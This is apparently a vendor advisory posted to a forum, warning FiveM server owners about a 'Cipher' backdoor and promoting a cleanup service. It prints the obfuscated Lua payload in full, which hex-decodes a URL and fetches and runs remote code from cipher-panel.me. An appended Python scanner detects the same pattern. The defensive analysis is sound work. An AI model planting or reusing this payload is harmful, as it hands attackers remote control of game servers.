Hello everyone!
We would like to update you on the FiveM Backdoor that has been going around.
This backdoor can be injected via an exploit... The current resources are:
1. Leaked or cracked resources
2. Car or map packs from unknown sources
3. Via runcode when using a really poor rcon_password
4. Exploitable resources such as esx_kashracters, vrp_basic_menu (old version), and any other resource that allows Lua code to run on the server side without permission checking
These guys are called Cipher. They are a group of French scammers attacking different vulnerable servers for money.
This is what their payload looks like:
code_language.lua:
    local Enchanced_Tabs = {
        Ench, Support, Host, Pairs,
        Realease, Callbacks, Source,
        Hosting, Event, PerformHttpRequest,
        assert, server, load, Spawn, materials
    }
    local random_char = {
        '68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
        '2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f'; '72',
        '2e', '70', '68', '70', '3f', '74', '6f', '3d', '30'
    }
    function str_utf8()
        _empt = ''
        for id,it in pairs(random_char) do
            _empt = _empt..it
        end
        return (_empt:gsub('..', function (cc)
            return string.char(tonumber(cc, 16))
        end))
    end
    Enchanced_Tabs[10](str_utf8(), function (e, d)
        local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
        if (d == nil) then return end
        s()
    end)
It basically does a PerformHttpRequest call with a GET request on
https://cipher-panel.me/_i/r.php?to=0
then loads and runs the output of that request.
Their web panel can access any server that has this backdoor installed, and you can't stop it until you remove it.
We are already dealing with this problem.
ChocoHax White searches for these backdoors, removes them, and cleans up your server from the malicious code.
Best regards.
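The following is an added example, not part of the original post and not ChocoHax's own code: a small Python scanner that looks in server resources for the obfuscation shown in the payload above (a Lua table of quoted hex bytes that decodes to a URL, in a file that also references PerformHttpRequest and load). The function names, the severity labels and the placeholder URL in the constructed sample are assumptions made for this example.

```python
import re
from pathlib import Path

# A run of 8+ quoted two-digit hex literals; Lua accepts ',' or ';' as separators.
HEX_RUN = re.compile(r"""(?:['"][0-9a-fA-F]{2}['"]\s*[,;]?\s*){8,}""")
HEX_BYTE = re.compile(r"""['"]([0-9a-fA-F]{2})['"]""")
URL = re.compile(r"https?://[^\s'\"]+")
# Identifiers the payload needs in order to fetch and then run remote code.
LOADERS = re.compile(r"\b(?:load|loadstring)\b")
FETCH = re.compile(r"\bPerformHttpRequest\b")

def decode_hex_runs(lua_source):
    """Decode every long run of quoted hex bytes into text."""
    out = []
    for run in HEX_RUN.finditer(lua_source):
        data = bytes(int(h, 16) for h in HEX_BYTE.findall(run.group(0)))
        out.append(data.decode("latin-1"))
    return out

def scan_source(lua_source):
    """Return findings for one Lua file: hidden URLs plus a severity label."""
    urls = [u for text in decode_hex_runs(lua_source) for u in URL.findall(text)]
    if not urls:
        return []
    # Hidden URL + HTTP fetch + load() in the same file matches the payload shape.
    both = LOADERS.search(lua_source) and FETCH.search(lua_source)
    severity = "high" if both else "review"
    return [{"url": u, "severity": severity} for u in urls]

def scan_tree(root):
    """Scan every .lua file under a resources directory; returns {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*.lua"):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

def make_sample(url):
    """Constructed test input shaped like the payload, using a placeholder URL."""
    table = ", ".join(f"'{b:02x}'" for b in url.encode()).replace(", ", "; ", 1)
    return ("local t = { PerformHttpRequest, assert, load }\n"
            f"local c = {{ {table} }}\n"
            "t[1](decode(c), function(e, d) t[3](d)() end)\n")
```

Point `scan_tree` at the server's resources directory and review every reported file by hand; a "review" hit only means a URL was hidden in a hex table.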